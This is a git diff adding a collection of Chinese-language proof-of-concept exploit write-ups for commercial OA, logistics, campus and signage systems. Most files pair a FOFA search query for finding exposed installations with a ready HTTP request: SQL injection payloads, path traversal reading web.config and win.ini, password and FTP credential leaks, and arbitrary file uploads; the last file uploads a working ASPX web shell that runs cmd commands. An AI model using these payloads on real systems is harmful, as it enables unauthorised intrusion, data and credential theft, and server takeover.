+        <request>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</request>
+      </WriteLog>
+    </soap:Body>
+  </soap:Envelope>
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1730710180719-f090ceb3-d687-4338-bc76-7417d07f5358.png)
+
diff --git a/易宝OA-BasicService.asmx存在SQL注入漏洞.md b/易宝OA-BasicService.asmx存在SQL注入漏洞.md
new file mode 100644
index 0000000..1769011
--- /dev/null
+++ b/易宝OA-BasicService.asmx存在SQL注入漏洞.md
@@ -0,0 +1,30 @@
+## 易宝OA-BasicService.asmx存在SQL注入漏洞
+
+
+## fofa
+
+```yaml
+title="欢迎登录易宝OA系统"
+```
+
+## poc
+
+```java
+POST /WebService/BasicService.asmx HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+SOAPAction: "http://tempuri.org/GetStreamID"
+Content-Length: 85
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+<soap:Body>
+<GetStreamID xmlns="http://tempuri.org/">
+<tableName>';waitfor delay '0:0:6'--+</tableName>
+<webservicePassword>{ac80457b-368d-4062-b2dd-ae4d490e1c4b}</webservicePassword>
+</GetStreamID>
+</soap:Body>
+</soap:Envelope>
+```
+
diff --git a/易宝OA-ExecuteQueryNoneResult接口处存在SQL注入漏洞.md b/易宝OA-ExecuteQueryNoneResult接口处存在SQL注入漏洞.md
new file mode 100644
index 0000000..9c8e139
--- /dev/null
+++ b/易宝OA-ExecuteQueryNoneResult接口处存在SQL注入漏洞.md
@@ -0,0 +1,22 @@
+# 易宝OA-ExecuteQueryNoneResult接口处存在SQL注入漏洞
+
+易宝OA ExecuteQueryNoneResult接口处存在SQL注入漏洞，未经身份认证的攻击者可以通过此漏洞获取数据库敏感信息，用户名密码等凭据，进一步利用可获取服务器权限。
+
+## FOFA
+
+```javascript
+product="顶讯科技-易宝OA系统"
+```
+
+## poc
+
+```javascript
+POST /api/system/ExecuteQueryNoneResult HTTP/1.1
+Host: your-ip
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
+ 
+token=zxh&cmdText=;WAITFOR DELAY '0:0:5'--
+```
+
+![image-20241025142137455](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410251421525.png)
diff --git a/易宝OA-ExecuteSqlForDataSet接口处存在SQL注入漏洞.md b/易宝OA-ExecuteSqlForDataSet接口处存在SQL注入漏洞.md
new file mode 100644
index 0000000..7fa5114
--- /dev/null
+++ b/易宝OA-ExecuteSqlForDataSet接口处存在SQL注入漏洞.md
@@ -0,0 +1,22 @@
+# 易宝OA-ExecuteSqlForDataSet接口处存在SQL注入漏洞
+
+易宝OA ExecuteSqlForDataSet接口处存在SQL注入漏洞，未经身份认证的攻击者可以通过此漏洞获取数据库敏感信息，用户名密码等凭据，进一步利用可获取服务器权限。
+
+## FOFA
+
+```javascript
+product="顶讯科技-易宝OA系统"
+```
+
+## poc
+
+```javascript
+POST /api/system/ExecuteSqlForDataSet HTTP/1.1
+Host: your-ip
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
+ 
+token=zxh&sql=;WAITFOR DELAY '0:0:5'--&strParameters
+```
+
+![image-20241024211640781](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410251419350.png)
diff --git a/易宝OA-ExecuteSqlForSingle-SQL注入漏洞.md b/易宝OA-ExecuteSqlForSingle-SQL注入漏洞.md
new file mode 100644
index 0000000..a0473d9
--- /dev/null
+++ b/易宝OA-ExecuteSqlForSingle-SQL注入漏洞.md
@@ -0,0 +1,19 @@
+## 易宝OA ExecuteSqlForSingle SQL注入漏洞
+
+## fofa
+```
+"顶讯科技"
+```
+
+## poc
+```
+POST /api/system/ExecuteSqlForSingle HTTP/1.1
+Host: IP:PORT
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
+Content-Length: 103
+
+token=zxh&sql=select substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)&strParameters
+```
+发送poc 在返回包中存在 `e10adc3949ba59abbe56e057f20f883e` 字符为存在漏洞
+
diff --git a/易宝OA-GetUDEFStreamID存在SQL注入漏洞.md b/易宝OA-GetUDEFStreamID存在SQL注入漏洞.md
new file mode 100644
index 0000000..4b49bc0
--- /dev/null
+++ b/易宝OA-GetUDEFStreamID存在SQL注入漏洞.md
@@ -0,0 +1,31 @@
+## 易宝OA-GetUDEFStreamID存在SQL注入漏洞
+
+易宝OA GetUDEFStreamID 接口存在SQL注入漏洞，未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息，攻击者甚至可以在高权限下向服务器写入命令，进一步获取服务器系统权限。
+
+
+## fofa
+
+```yaml
+app="顶讯科技-易宝OA系统"
+```
+
+## poc
+
+```java
+POST /WebService/BasicService.asmx HTTP/1.1
+Host: 
+Content-Type: text/xml; charset=utf-8
+Content-Length: length
+SOAPAction: "http://tempuri.org/GetUDEFStreamID"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <GetUDEFStreamID xmlns="http://tempuri.org/">
+      <tableName>';WAITFOR DELAY '0:0:5'--</tableName>
+      <webservicePassword>{ac80457b-368d-4062-b2dd-ae4d490e1c4b}</webservicePassword>
+    </GetUDEFStreamID>
+  </soap:Body>
+</soap:Envelope>
+```
+
diff --git a/易思智能物流无人值守系统DownFile任意文件读取漏洞.md b/易思智能物流无人值守系统DownFile任意文件读取漏洞.md
new file mode 100644
index 0000000..6fc8441
--- /dev/null
+++ b/易思智能物流无人值守系统DownFile任意文件读取漏洞.md
@@ -0,0 +1,21 @@
+# 易思智能物流无人值守系统DownFile任意文件读取漏洞
+
+易思智能物流无人值守系统DownFile任意文件读取漏洞
+
+## fofa
+
+```javascript
+body="/api/SingleLogin"
+```
+
+## poc
+
+```javascript
+GET /PublicInfoManage/Upload/DownFile?filePath=web.config HTTP/1.0
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+```
+
+![image-20241106172615405](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061726493.png)
\ No newline at end of file
diff --git a/易思智能物流无人值守系统ExportReport存在SQL注入漏洞.md b/易思智能物流无人值守系统ExportReport存在SQL注入漏洞.md
new file mode 100644
index 0000000..980f9c9
--- /dev/null
+++ b/易思智能物流无人值守系统ExportReport存在SQL注入漏洞.md
@@ -0,0 +1,22 @@
+## 易思智能物流无人值守系统ExportReport存在SQL注入漏洞
+
+易思智能物流无人值守系统ExportReport存在SQL注入漏洞
+
+## fofa
+
+```javascript
+body="/api/SingleLogin"
+```
+
+## poc
+
+```javascript
+POST /Sys_ReportFile/ExportReport HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+ 
+rep_Ids=1%27%29+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2C@@VERSION%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--+CdNX
+```
+
diff --git a/易思智能物流无人值守系统ImportReport任意文件上传漏洞.md b/易思智能物流无人值守系统ImportReport任意文件上传漏洞.md
new file mode 100644
index 0000000..faf75ba
--- /dev/null
+++ b/易思智能物流无人值守系统ImportReport任意文件上传漏洞.md
@@ -0,0 +1,47 @@
+# 易思智能物流无人值守系统ImportReport任意文件上传漏洞
+
+# 一、漏洞简介
+易思无人值守智能物流系统是一款集成了人工智能、机器人技术和物联网技术的创新产品。它能够自主完成货物存储、检索、分拣、装载以及配送等物流作业，帮助企业实现无人值守的智能物流运营，提高效率、降低成本，为现代物流行业带来新的发展机遇。Sys_ReportFile/ImportReport接口处存在任意文件上传漏洞，未经授权的攻击者可通过此漏洞上传恶意后门文件，从而获取服务器权限。
+
+# 二、影响版本
++ 易思智能物流无人值守系统5.0
+
+# 三、资产测绘
++ hunter`web.body=="易思无人值守智能物流"`
++ 登录页面
+
+![1693024220415-3267a1b1-e688-4081-8abc-9bc7ee3c98f5.png](./img/b79hLMH0rZJLZ-gK/1693024220415-3267a1b1-e688-4081-8abc-9bc7ee3c98f5-749693.png)
+
+# 四、漏洞复现
+```plain
+POST /Sys_ReportFile/ImportReport?encode=b HTTP/1.1
+Content-Type: multipart/form-data; boundary=00content0boundary00
+User-Agent: Java/1.8.0_381
+Host: xx.xx.xx.xx
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Content-Length: 130
+Connection: close
+
+--00content0boundary00
+Content-Disposition: form-data; name="file"; filename="test.grf;.aspx"
+
+test
+--00content0boundary00--
+```
+
+---
+
+![1693024452182-530d1309-112a-492f-939f-765a7d836023.png](./img/b79hLMH0rZJLZ-gK/1693024452182-530d1309-112a-492f-939f-765a7d836023-787469.png)
+
+上传文件位置
+
+```plain
+http://xx.xx.xx.xx/GRF/Custom/b.aspx
+```
+
+![1693024495082-6622e59c-5e8c-4660-9a4f-d88ebac7c226.png](./img/b79hLMH0rZJLZ-gK/1693024495082-6622e59c-5e8c-4660-9a4f-d88ebac7c226-123038.png)
+
+
+
+> 更新: 2024-02-29 23:55:51  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/uklfg9x4h2md4vgi>
\ No newline at end of file
diff --git a/易思智能物流无人值守系统downfile文件读取漏洞.md b/易思智能物流无人值守系统downfile文件读取漏洞.md
new file mode 100644
index 0000000..78a14d7
--- /dev/null
+++ b/易思智能物流无人值守系统downfile文件读取漏洞.md
@@ -0,0 +1,33 @@
+# 易思智能物流无人值守系统downfile文件读取漏洞
+
+# 一、漏洞简介
+易思无人值守智能物流系统是一款集成了人工智能、机器人技术和物联网技术的创新产品。它能够自主完成货物存储、检索、分拣、装载以及配送等物流作业，帮助企业实现无人值守的智能物流运营，提高效率、降低成本，为现代物流行业带来新的发展机遇易思智能物流无人值守系统存在任意文件读取漏洞，攻击者可利用该漏洞获取敏感信息。
+
+# 二、影响版本
++ 易思智能物流无人值守系统5.0
+
+# 三、资产测绘
++ hunter`web.body=="易思无人值守智能物流"`
++ 登录页面
+
+![1693024220415-3267a1b1-e688-4081-8abc-9bc7ee3c98f5.png](./img/zHmIGN6ZM2to5xhJ/1693024220415-3267a1b1-e688-4081-8abc-9bc7ee3c98f5-647498.png)
+
+# 四、漏洞复现
+```plain
+GET /PublicInfoManage/Upload/DownFile?filePath=web.config  HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: ASP.NET_SessionId=c5z5wepqulqppvdagvif5dlv
+Upgrade-Insecure-Requests: 1
+```
+
+![1700135803485-90ab3f35-bbdd-4c91-bf00-5e9736ac7ecb.png](./img/zHmIGN6ZM2to5xhJ/1700135803485-90ab3f35-bbdd-4c91-bf00-5e9736ac7ecb-494541.png)
+
+
+
+> 更新: 2024-02-29 23:55:51  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yd8bodau0wlc1qrf>
\ No newline at end of file
diff --git a/易思智能物流无人值守系统login存在SQL注入漏洞.md b/易思智能物流无人值守系统login存在SQL注入漏洞.md
new file mode 100644
index 0000000..83a0b71
--- /dev/null
+++ b/易思智能物流无人值守系统login存在SQL注入漏洞.md
@@ -0,0 +1,37 @@
+## 易思智能物流无人值守系统login存在SQL注入漏洞
+
+易思智能物流无人值守系统login存在SQL注入漏洞.md
+
+## fofa
+
+```javascript
+body="/api/SingleLogin"
+```
+
+## poc
+
+```javascript
+POST /api/PhoneLogin/login HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Accept-Encoding: gzip
+
+Account=1'%20and%20sys.fn_sqlvarbasetostr(HashBytes('MD5','123'))=1--&Espassword=g5edid4OCFI32C5NPEZeXg%3D%3D
+```
+
+```javascript
+OST /api/SingleLogin/login HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: application/x-www-form-urlencoded; charset=utf-8
+Priority: u=0
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip, deflate
+
+LoginUserType=0&DeviceType=2&Account=1'%20and%20sys.fn_sqlvarbasetostr(HashBytes('MD5','123'))=1--&BrowserType=Firefox&Verifycode=&IMEI=&isverify=false&SetOfBooks=Default&Espassword=1wD%2Bj6eIbahZGOatg1Spiw%3D%3D
+```
+
+![image-20241106172316570](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061723637.png)
diff --git a/星网锐捷DMB-BSLED屏信息发布系统taskexport接口处存在敏感信息泄露.md b/星网锐捷DMB-BSLED屏信息发布系统taskexport接口处存在敏感信息泄露.md
new file mode 100644
index 0000000..24d1360
--- /dev/null
+++ b/星网锐捷DMB-BSLED屏信息发布系统taskexport接口处存在敏感信息泄露.md
@@ -0,0 +1,32 @@
+# 星网锐捷 DMB-BS LED屏信息发布系统taskexport接口处存在敏感信息泄露
+
+**一、漏洞简介**  
+<font style="color:rgb(34, 34, 34);">星网锐捷 DMB-BS LED屏信息发布系统taskexport接口处存在敏感信息泄露，攻击者可以可以通过此漏洞读取 FTP 服务器地址、端口及账号密码，通过 FTP 可篡改 LED 发布信息</font>  
+**二、影响版本**
+
+星网锐捷信息发布系统
+
+**三、资产测绘**
+
+```plain
+app="STAR_NET-数字标牌系统"
+```
+
+![1714230441699-d5a76730-3ee2-45ac-ac2c-f0fc80a888f2.png](./img/L5KeVGbPn4qhJj98/1714230441699-d5a76730-3ee2-45ac-ac2c-f0fc80a888f2-017172.png)
+
+●登录![1713938803895-b19dd8b0-de6f-4aa9-9c79-2871255ec1ee.png](./img/L5KeVGbPn4qhJj98/1713938803895-b19dd8b0-de6f-4aa9-9c79-2871255ec1ee-123299.png)
+
+**四、漏洞复现**
+
+```plain
+/dmb/out/taskexport.jsp?taskcode
+```
+
+![1713938753911-0910a298-b3a4-49a1-842c-5baf166b0abd.png](./img/L5KeVGbPn4qhJj98/1713938753911-0910a298-b3a4-49a1-842c-5baf166b0abd-242564.png)
+
+[XWRJ-DMB-BS-InformationLeakage.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1719200545313-daca3f8d-524a-48d9-83ba-d930e0d9385b.yaml)
+
+
+
+> 更新: 2024-06-24 11:42:25  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ef3dwszacv0ypayp>
\ No newline at end of file
diff --git a/星网锐捷视频话机设备pwdsetting管理密码泄漏.md b/星网锐捷视频话机设备pwdsetting管理密码泄漏.md
new file mode 100644
index 0000000..71d2aef
--- /dev/null
+++ b/星网锐捷视频话机设备pwdsetting管理密码泄漏.md
@@ -0,0 +1,28 @@
+# 星网锐捷视频话机设备pwdsetting管理密码泄漏
+
+**一、漏洞简介**  
+<font style="color:rgb(34, 34, 34);">星网锐捷视频话机设备  泄露管理员密码，攻击者可利用密码直接进入后台配置页面，执行恶意操作，为进一步攻击提供帮助。</font>  
+**二、影响版本**
+
+星网锐捷视频话机设备
+
+**三、资产测绘**
+
+```plain
+body="tmid_top_label"
+```
+
+●登录页![1711938753201-a499e700-224a-4dd8-bf3b-ea7d54ed1574.png](./img/DzvaFQV7DsT5tO_q/1711938753201-a499e700-224a-4dd8-bf3b-ea7d54ed1574-768831.png)
+
+**四、漏洞复现**
+
+```plain
+/console/secure/pwdsetting
+```
+
+![1711938770662-d997d58a-e99d-4997-8e3a-2ff9d2977ab8.png](./img/DzvaFQV7DsT5tO_q/1711938770662-d997d58a-e99d-4997-8e3a-2ff9d2977ab8-412419.png)
+
+
+
+> 更新: 2024-06-24 11:42:25  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cmom2yrgpqpou44c>
\ No newline at end of file
diff --git a/智互联(深圳)科技有限公司SRM智联云采系统download存在任意文件读取漏洞.md b/智互联(深圳)科技有限公司SRM智联云采系统download存在任意文件读取漏洞.md
new file mode 100644
index 0000000..62ec54a
--- /dev/null
+++ b/智互联(深圳)科技有限公司SRM智联云采系统download存在任意文件读取漏洞.md
@@ -0,0 +1,19 @@
+# 智互联(深圳)科技有限公司SRM智联云采系统download存在任意文件读取漏洞
+
+智互联(深圳)科技有限公司SRM智联云采系统download存在任意文件读取漏洞
+
+## fofa
+
+```yaml
+title=="SRM 2.0"
+```
+
+## poc
+
+```java
+GET /adpweb/static/%2e%2e;/a/sys/runtimeLog/download?path=c:\\windows\win.ini HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408162052746.png)
diff --git a/智慧平台SExcelExpErr.ashx存在SQL注入漏洞.md b/智慧平台SExcelExpErr.ashx存在SQL注入漏洞.md
new file mode 100644
index 0000000..b3f8c0b
--- /dev/null
+++ b/智慧平台SExcelExpErr.ashx存在SQL注入漏洞.md
@@ -0,0 +1,23 @@
+### 智慧平台SExcelExpErr.ashx存在SQL注入漏洞
+智慧平台SExcelExpErr存在SQL注入漏洞，攻击者可通过该漏洞获取数据敏感信息。
+
+## fofa
+```javascript
+body="custom/blue/uimaker/easyui.css"
+```
+
+## poc
+
+```plain
+GET /ashx/KQ/SExcelExpErr.ashx?action=list&importtype=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1
+Host: 
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1728547381034-1a95c6c4-532a-43f3-b852-1c52b5cb8fc5.png)
+
diff --git a/智慧校园(安校易)管理系统FileUpAd.aspx任意文件上传漏洞.md b/智慧校园(安校易)管理系统FileUpAd.aspx任意文件上传漏洞.md
new file mode 100644
index 0000000..9097e70
--- /dev/null
+++ b/智慧校园(安校易)管理系统FileUpAd.aspx任意文件上传漏洞.md
@@ -0,0 +1,31 @@
+## 智慧校园(安校易)管理系统FileUpAd.aspx任意文件上传漏洞
+
+智慧校园(安校易)管理系统  FileUpAd.aspx 接口处存在任意文件上传漏洞，未经身份验证的攻击者通过漏洞上传恶意后门文件，执行任意代码，从而获取到服务器权限。
+
+## fofa
+
+```yaml
+title="智慧综合管理平台登入"
+```
+
+## poc
+
+```java
+POST /Module/FileUpPage/FileUpAd.aspx?file_tmid=upload HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
+X-Requested-With: XMLHttpRequest
+Content-Type: multipart/form-data; boundary=----21909179191068471382830692394
+Connection: close
+ 
+------21909179191068471382830692394
+Content-Disposition: form-data; name="File"; filename="asd.aspx"
+Content-Type: image/jpeg
+ 
+<%@ Page Language="Jscript" validateRequest="false" %><%var c=new System.Diagnostics.ProcessStartInfo("cmd");var e=new System.Diagnostics.Process();var out:System.IO.StreamReader,EI:System.IO.StreamReader;c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=true;e.StartInfo=c;c.Arguments="/c " + Request.Item["cmd"];e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();Response.Write(out.ReadToEnd() + EI.ReadToEnd());System.IO.File.Delete(Request.PhysicalPath);Response.End();%>
+------21909179191068471382830692394--
+```
+
